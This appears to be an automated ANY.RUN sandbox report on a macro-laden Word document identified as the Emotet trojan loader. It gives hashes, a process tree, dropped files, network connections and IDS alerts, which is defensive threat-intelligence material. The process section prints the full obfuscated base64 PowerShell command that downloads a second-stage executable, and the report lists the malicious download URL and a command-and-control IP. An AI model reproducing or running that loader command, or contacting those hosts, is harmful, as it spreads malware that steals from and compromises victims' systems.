analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

f9035cfaa96582c497f7ecdeeab6b5e9d2101cae007f011faa448bb360a98c92.doc

Full analysis: https://app.any.run/tasks/5cd3d82a-33b4-40ea-ae92-abdf184f4e3b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 14, 2019, 14:21:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
feodo
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 14 06:50:00 2019, Last Saved Time/Date: Thu Mar 14 06:50:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 12, Security: 0
MD5:

5D44EC39CA9A95812FDFBC90E0C2E527

SHA1:

39698F5324385B410B52E0E7D33DC460F437191E

SHA256:

F9035CFAA96582C497F7ECDEEAB6B5E9D2101CAE007F011FAA448BB360A98C92

SSDEEP:

6144:J77HUUUUUUUUUUUUUUUUUUUT52V5VthAdIl8wxoDSJEqpyukOtHL3ag51:J77HUUUUUUUUUUUUUUUUUUUTCJhAOGux

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 947.exe (PID: 2200)
      • 947.exe (PID: 3220)
      • wabmetagen.exe (PID: 2692)
      • wabmetagen.exe (PID: 3384)
      • PjlUKs.exe (PID: 3896)
      • PjlUKs.exe (PID: 2392)
      • wabmetagen.exe (PID: 2784)
      • wabmetagen.exe (PID: 3940)
    • Emotet process was detected

      • wabmetagen.exe (PID: 2692)
      • wabmetagen.exe (PID: 3940)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2840)
    • EMOTET was detected

      • wabmetagen.exe (PID: 3384)
      • wabmetagen.exe (PID: 2784)
    • Connects to CnC server

      • wabmetagen.exe (PID: 3384)
      • wabmetagen.exe (PID: 2784)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 3384)
  • SUSPICIOUS

    • Application launched itself

      • 947.exe (PID: 2200)
      • wabmetagen.exe (PID: 2692)
      • PjlUKs.exe (PID: 3896)
      • wabmetagen.exe (PID: 3940)
    • Creates files in the user directory

      • powershell.exe (PID: 2840)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2840)
      • 947.exe (PID: 3220)
      • wabmetagen.exe (PID: 3384)
      • PjlUKs.exe (PID: 2392)
    • Starts itself from another location

      • 947.exe (PID: 3220)
      • PjlUKs.exe (PID: 2392)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2852)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2852)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 13
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 12
Words: 2
Pages: 1
ModifyDate: 2019:03:14 06:50:00
CreateDate: 2019:03:14 06:50:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
10
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start winword.exe no specs powershell.exe 947.exe no specs 947.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe pjluks.exe no specs pjluks.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2852"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f9035cfaa96582c497f7ecdeeab6b5e9d2101cae007f011faa448bb360a98c92.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2840powershell -e JgAoACAAJABFAG4AdgA6AEMATwBtAHMAcABFAEMAWwA0ACwAMgA2ACwAMgA1AF0ALQBqAG8AaQBuACcAJwApACgAbgBlAHcALQBPAEIASgBlAEMAdAAgAHMAeQBzAHQARQBNAC4AaQBvAC4AYwBvAG0AUABSAGUAUwBTAGkATwBuAC4ARABFAEYATABBAHQARQBzAHQAUgBlAGEAbQAoAFsAaQBvAC4AbQBlAE0AbwByAFkAcwB0AHIAZQBBAE0AXQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAFIATwBNAEIAYQBzAEUANgA0AHMAVAByAGkATgBnACgAKAAnAFYAWgBGACcAKwAnAGgAYQA5ACcAKwAnAHMAdwAnACsAJwBGACcAKwAnAEUAWAAvAGkAagAnACsAJwA4ACcAKwAnAFkAJwArACcAbABKACcAKwAnAEIAWgBxAGoATQBuAGIAVwAnACsAJwBvAE0AZgAnACsAJwBiACcAKwAnAFoAJwArACcAcAAnACsAJwBDAEcAeAAnACsAJwBqAHAAcQBnAHoAWQAnACsAJwBSACcAKwAnAEIAJwArACcAcwBXAFkAJwArACcAbAAnACsAJwBkAE8ANQBJAGIAeQAnACsAJwBYAFcAVABrACcAKwAnAFAAOAAnACsAJwArAFoAJwArACcAUwBUAHQAJwArACcAcABrADgAUwAnACsAJwBuACcAKwAnAEgAZgBmACcAKwAnADUAJwArACcAYwBnAE8AJwArACcARQAnACsAJwAxACcAKwAnAGoAUgBOAEkAMABEACcAKwAnADkAQwAnACsAJwAxAEoAVgAnACsAJwBqACcAKwAnAEMAbgB5AEwAZQAnACsAJwBmACcAKwAnAEkAWQBWAFEAJwArACcAeQBrAEQAdwAnACsAJwAzAHAASAA1AEMAMgBmACcAKwAnAGEAKwAnACsAJwBzAEUAMQAvACcAKwAnAHMAWAB6ACcAKwAnAHEAJwArACcASwBtADQAMAAnACsAJwBMADcAOQAnACsAJwBIAFoAWQAnACsAJwBRAG0AJwArACcANQBsAFMANgAvAGEAZQBFAEwARwBwAHEAMABLAFYAcwAnACsAJwBzAFYATQAnACsAJwBiACcAKwAnAGsAbgBmAE8AawB3ACcAKwAnAEsAYgBVAEQAeQByAEwAZAAzADUATwBGACcAKwAnAEMATQAnACsAJwBiAEgATwB0AGwAVwB6ADcAJwArACcAMwAnACsAJwBuAFcAJwArACcANgBQAEkAJwArACcAdgB5ACcAKwAnAHAAUQBpAGIAZgAnACsAJwBkAEIAdQBKAE0AJwArACcAWgBuAGsAJwArACcANgAnACsAJwB3ACcAKwAnAGQANAAnACsAJwB2AEgAcgAnACsAJwB2AHQAdgAnACsAJwBUACcAKwAnAHQAYwAyAE0AaQBzAFUAVQBWADAAcABQAHUAJwArACcAagAnACsAJwBpACcAKwAnAHMAQgBjAGMAQwAnACsAJwA2ADcAJwArACcASgAnACsAJwB5AHkARQByAGMANgBjAFYAQgB6AFoAVgBqAHQAJwArACcAdwBYACcAKwAnAFcAdQBXAHYAMwBTACcAKwAnAHMAWgBaADEATwBZACcAKwAnAGYAJwArACcASQBhADcAZAAnACsAJwAzAGoAcwBZAGYAJwArACcAZAAnACsAJwBtAGgAcwBkAGYAJwArACcAcAArAGYAJwArACcAMABTAHIAQwBtACcAKwAnAEsANwBnAGkAJwArACcAMwAnACsAJwBzAC8ATwAnACsAJwBJAHcAJwArACcAZwAnACsAJwAvACcAKwAnAHQAVQAyAGwAQgArACcAKwAnAGcAQgBEAFgAJwArACcAMgBiAHoAVAAwADMAJwArACcAWAAnACsAJwBOAEUAJwArACcAawBRAEEAJwArACcAcABpAGcARQBpAEMAJwArACcARQAnACsAJwBhAE4AaQBvAEEAbQAxAEEAZwAnACsAJwB2AE4AdgBGAHYAegBmAHUAegBaAEUAJwArACcAcAAnACsAJwBJACcAKwAnAGwARABkAEEAQgBrAGoAQwBGADEAUgBtAEsARwBYAGgAJwArACcASgBGAEEAJwArACcAWQAyAEYAMgAvADMAbgBlAEsAJwArACcANwBkAGkAJwArACcAZgAnACsAJwBYAFYAYwBOAEgAJwArACcANgBEAGMAYQBYAFMAJwArACcASgBHACcAKwAnAEMAUAAnACsAJwBOADMAJwArACcAagAnACsAJwB2ACcAKwAnAHkAMQAnACsAJwAzACcAKwAnAFAARwAnACsAJwBNAGwAUQBQADcAeQBTAGkAUAAnACsAJwB3AEsAJwArACcAcQBFACcAKwAnAGQAJwArACcAWABFADcAUABPAHIAZAAvAG4AagA5AEMAaAAnACsAJwB6AEwAWABwAHcAVgBQACcAKwAnAEoAcQAnACsAJwBnAEsALwAzACcAKwAnAEYAdQB1ACcAKwAnADQAeQAnACsAJwBmAGEAJwArACcAcwBVACcAKwAnAHEAJwArACcAQgBjAEcASwBIAE0AJwArACcAVABnACcAKwAnAE4AcgAwAFcASwAnACsAJwB5ACcAKwAnAHQAdwBXACcAKwAnAEQATwB0AGIAUABRAGYAUAAnACsAJwB0AEoANABvAGEATABqAFMANAAnACsAJwB0AFoAOAAnACsAJwBNAHQANwAnACsAJwA4AGEAYwBvAFgAVgBjAGkAJwArACcARABkAFoAOAAvACcAKwAnADkAQgAzADIANAAnACsAJwBqACcAKwAnAGsAJwArACcASABVAGMAQgBhAGgAaQBkAEUAbAAnACsAJwBEACcAKwAnADUATwBlAG0AYQArADIAZgBUAGkAegBUAHIAJwArACcARAB5AGUAVAB2AFkAJwArACcAYwBRAGcAJwArACcAQgBqAHEASQBOADMAYwA2AEYAbQAnACsAJwA2AFIAJwArACcAOAA9ACcAKQAgACkALAAgAFsASQBvAC4AQwBvAE0AUABSAGUAUwBTAGkATwBOAC4AYwBPAE0AUAByAGUAcwBzAGkATwBuAG0AbwBEAEUAXQA6ADoAZABlAEMAbwBtAHAAcgBlAFMAUwAgACkAfAAgAEYATwByAGUAYQBjAGgAIAB7AG4AZQB3AC0ATwBCAEoAZQBDAHQAIABzAHkAUwBUAEUAbQAuAEkATwAuAFMAVAByAGUAYQBNAHIAZQBhAEQAZQByACgAJABfACAALABbAFQARQB4AFQALgBFAG4AYwBvAEQAaQBOAEcAXQA6ADoAYQBzAEMASQBJACAAKQB9ACkALgBSAEUAYQBkAHQAbwBlAG4AZAAoACAAKQAgAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2200"C:\Users\admin\947.exe" C:\Users\admin\947.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3220"C:\Users\admin\947.exe"C:\Users\admin\947.exe
947.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2692"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
947.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3384"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3896"C:\Users\admin\AppData\Local\wabmetagen\PjlUKs.exe"C:\Users\admin\AppData\Local\wabmetagen\PjlUKs.exewabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2392"C:\Users\admin\AppData\Local\wabmetagen\PjlUKs.exe"C:\Users\admin\AppData\Local\wabmetagen\PjlUKs.exe
PjlUKs.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3940"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
PjlUKs.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2784"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Sticky Notes
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 717
Read events
1 301
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2852WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE3BD.tmp.cvr
MD5:
SHA256:
2840powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TONP9EJFMMZG7U14EMUV.temp
MD5:
SHA256:
2840powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20ecd5.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2840powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2840powershell.exeC:\Users\admin\947.exeexecutable
MD5:4C360A02C6E203CCCE739320641B9827
SHA256:821F60D640C6C98FDF653A5356C1D4AF59E1FC70F3B89117705C87ACDC56D5A5
2852WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$035cfaa96582c497f7ecdeeab6b5e9d2101cae007f011faa448bb360a98c92.docpgc
MD5:085893323E4DEDC9B54903E33CB9BFA4
SHA256:CD09541B2066705EED769622088DA3B4BFA0275E0DEB2842C7B07C6F8CA8F4C8
2852WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:633EDCAF70A08EA4C8F9489679EF5BF4
SHA256:446A4274C3E9935A40A0EA6332996E3ABECA0B7D59EB8A541F56397F29158E6E
3384wabmetagen.exeC:\Users\admin\AppData\Local\wabmetagen\PjlUKs.exeexecutable
MD5:8DBA1CD27B26A4CCA7A7ABFE5E0A1211
SHA256:5CEC235743655E5FD905DDDC42F534F8E13761725845A3692F8E396510CBA7F7
2392PjlUKs.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:8DBA1CD27B26A4CCA7A7ABFE5E0A1211
SHA256:5CEC235743655E5FD905DDDC42F534F8E13761725845A3692F8E396510CBA7F7
3220947.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:4C360A02C6E203CCCE739320641B9827
SHA256:821F60D640C6C98FDF653A5356C1D4AF59E1FC70F3B89117705C87ACDC56D5A5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2840
powershell.exe
GET
200
103.57.209.252:80
http://ngkidshop.com/wp-content/Vtm8/
VN
executable
355 Kb
malicious
3384
wabmetagen.exe
GET
200
82.78.228.57:443
http://82.78.228.57:443/
RO
binary
136 Kb
malicious
2784
wabmetagen.exe
GET
82.78.228.57:443
http://82.78.228.57:443/
RO
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2784
wabmetagen.exe
82.78.228.57:443
RCS & RDS
RO
malicious
3384
wabmetagen.exe
82.78.228.57:443
RCS & RDS
RO
malicious
2840
powershell.exe
103.57.209.252:80
ngkidshop.com
VN
suspicious

DNS requests

Domain
IP
Reputation
ngkidshop.com
  • 103.57.209.252
malicious

Threats

PID
Process
Class
Message
2840
powershell.exe
Misc Attack
ET COMPROMISED Known Compromised or Hostile Host Traffic group 1
2840
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2840
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2840
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2840
powershell.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
3384
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2784
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2 ETPRO signatures available at the full report
No debug info